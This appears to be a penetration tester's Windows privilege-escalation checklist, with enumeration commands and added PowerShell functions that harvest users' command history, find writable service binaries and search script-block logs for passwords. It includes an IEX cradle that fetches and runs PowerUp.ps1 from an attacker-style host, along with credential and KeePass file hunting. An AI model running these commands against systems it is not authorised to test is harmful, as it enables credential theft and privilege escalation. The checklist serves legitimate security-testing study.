# Checklist

{% hint style="info" %}
If the shell has a stripped environment, restore the standard tool paths first (note the separator after `%PATH%`):

```
set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;
```
{% endhint %}

#### Basic enum / quick wins

```
whoami /all
```

```
cmdkey /list
```

```
systeminfo
```

```
net user
net user <current user>
```

```
net group
```

```
Get-History
```

```
(Get-PSReadlineOption).HistorySavePath
type <previous command output>
```

```
ls C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
```

{% hint style="info" %}
Do this for every user profile you can read, and repeat it during post-exploitation as well.
{% endhint %}
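The hint above says to check PSReadLine history for every user; the function below does that in one pass. It is an added example, not part of the original checklist, and it assumes the default profile root `C:\Users` and the default PSReadLine history path shown above for "bob".

```powershell
# Added example (not from the original checklist): read the PSReadLine
# command history of every profile under $ProfileRoot that the current
# account is allowed to read, one object per history line.
function Get-AllUsersPSHistory {
    param(
        # Assumed default location of user profiles
        [string]$ProfileRoot = 'C:\Users'
    )

    # Same relative path the checklist shows for a single user
    $relative = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'

    # $userDir rather than $profile, which is a PowerShell automatic variable
    foreach ($userDir in Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue) {
        $historyFile = Join-Path -Path $userDir.FullName -ChildPath $relative
        if (-not (Test-Path -LiteralPath $historyFile)) { continue }

        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $historyFile -ErrorAction SilentlyContinue) {
            $lineNo++
            [pscustomobject]@{
                User    = $userDir.Name
                Line    = $lineNo
                Command = $line
            }
        }
    }
}

# Usage: dump everything, then narrow to lines that look like they carry credentials
Get-AllUsersPSHistory |
    Where-Object Command -match 'password|passwd|secret|ConvertTo-SecureString|-Credential' |
    Format-Table -AutoSize
```

Profiles whose `AppData` the current account cannot read are skipped silently because of `-ErrorAction SilentlyContinue`; run it again after obtaining a higher-privileged shell to cover the rest.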

#### Network and port enum

```
ipconfig /all
```

```
netstat -ano
route print
```

#### Installed software and service enum

```
dir C:\
dir "C:\Program Files"
dir "C:\Program Files (x86)"
```

```
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
```

```
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
```

```
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
```

```
services
```

```
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
```

```
icacls <service binary path>
```
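The `icacls <service binary path>` step is usually repeated by hand for each running service. The function below, an added example that is not part of the original checklist, automates it: it resolves the executable from each service's `PathName` (quoted or unquoted) and reports ACEs that grant write-type rights to low-privilege principals. The list of principals and the rights mask are assumptions chosen for the example.

```powershell
# Added example (not from the original checklist): audit the binary of every
# running service for ACEs that let low-privilege principals modify it.
function Get-WeakServiceBinaryAcl {
    # Assumed set of principals that should never hold write rights on a service binary
    $lowPriv = @(
        'Everyone',
        'BUILTIN\Users',
        'NT AUTHORITY\Authenticated Users',
        'NT AUTHORITY\INTERACTIVE'
    )
    # Assumed set of rights that allow replacing or altering the executable
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.State -eq 'Running' -and $_.PathName } |
        ForEach-Object {
            $svc = $_
            # PathName may be quoted ("C:\Program Files\x\y.exe" -arg) or
            # unquoted (C:\x\y.exe -arg); take the executable part only
            $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] }
                   elseif ($svc.PathName -match '^(.+?\.exe)') { $Matches[1] }
                   else { $svc.PathName.Split(' ')[0] }

            if (-not (Test-Path -LiteralPath $exe)) { return }

            $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
            if (-not $acl) { return }

            foreach ($ace in $acl.Access) {
                $isLowPriv   = $lowPriv -contains $ace.IdentityReference.Value
                $grantsWrite = ($ace.AccessControlType -eq 'Allow') -and
                               (($ace.FileSystemRights -band $writeMask) -ne 0)
                if ($isLowPriv -and $grantsWrite) {
                    [pscustomobject]@{
                        Service   = $svc.Name
                        RunsAs    = $svc.StartName
                        Binary    = $exe
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                    }
                }
            }
        }
}

# Usage: an empty result means no running service binary is writable by the listed principals
Get-WeakServiceBinaryAcl | Format-Table -AutoSize
```

The `RunsAs` column matters for triage: a writable binary for a service running as `LocalSystem` is the finding to fix first, and the fix is to correct the ACL on the file (and its parent directory), not just to restart the service.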

#### Sensitive file enum

```
$env:AppKey
```

```
# .git is a directory, so -File would hide it; omit -File to match both
gci -Path C:\ -Include *.kdbx,.git -Recurse -ErrorAction SilentlyContinue
```

```
gci -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
```

```
gci -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
```

```
gci -h -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
```

```
gci C:\Users\Public
```

```
where.exe /R C:\Windows bash.exe
where.exe /R C:\Windows wsl.exe
```

#### Process snooping

```
Import-Module .\Watch-Command.ps1
# Get-Process objects expose ProcessName ("Image Name" is the tasklist column)
Get-Process | Watch-Command -Diff -Cont -Verbose -Property ProcessName
```

1. Winpeas

```
# curl is an alias for Invoke-WebRequest in Windows PowerShell; use the full parameter name
Invoke-WebRequest -Uri http://192.168.45.x/winPEAS.exe -OutFile winpeas.exe -UseBasicParsing
.\winpeas.exe
```

2. PowerUp

```
IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/PowerUp.ps1');Invoke-Allchecks
```

3. PrivescCheck

```
powershell.exe -ep bypass -NoP -c '. .\PrivescCheck.ps1; Invoke-PrivescCheck'
```

{% hint style="info" %}
As a last resort, dig through the event log for events recorded by Script Block Logging. Maybe there will be a password lol.
{% endhint %}

1. eventvwr
2. Applications and Services Logs
3. Microsoft
4. Windows
5. PowerShell
6. Operational
7. Filter Current Log
8. Event ID 4104
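The same search from the command line, as an added example that is not part of the original checklist. It reads Event ID 4104 from the PowerShell Operational log with `Get-WinEvent` and keeps only script blocks matching a credential-like pattern; the default pattern and the event cap are assumptions for the example.

```powershell
# Added example (not from the original checklist): command-line equivalent of
# the Event Viewer steps. Returns Script Block Logging entries (ID 4104) whose
# text matches $Pattern.
function Get-ScriptBlockLogEntries {
    param(
        # Assumed pattern for credential-looking script text; pass '' to return everything
        [string]$Pattern = 'password|passwd|pwd|secret|ConvertTo-SecureString|-Credential',
        [int]$MaxEvents = 5000
    )

    $filter = @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'
        Id      = 4104
    }

    try {
        $events = Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction Stop
    } catch {
        # Get-WinEvent throws when the log is unreadable or holds no matching events
        Write-Verbose "No 4104 events readable: $($_.Exception.Message)"
        return
    }

    foreach ($e in $events) {
        # 4104 event properties, in order: MessageNumber, MessageTotal,
        # ScriptBlockText, ScriptBlockId, Path
        $text = $e.Properties[2].Value
        if ($Pattern -and $text -notmatch $Pattern) { continue }
        [pscustomobject]@{
            Time          = $e.TimeCreated
            ScriptBlockId = $e.Properties[3].Value
            Path          = $e.Properties[4].Value
            # Long script blocks are logged as several parts; this shows which one
            Part          = "$($e.Properties[0].Value)/$($e.Properties[1].Value)"
            Text          = $text
        }
    }
}

# Usage: review matching blocks in full; widen with -Pattern '' if nothing matches
Get-ScriptBlockLogEntries | Format-List
```

Because a large script is split across several 4104 events, a secret can sit in a part other than the one that matched; group the output by `ScriptBlockId` before drawing conclusions about what a script actually did.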
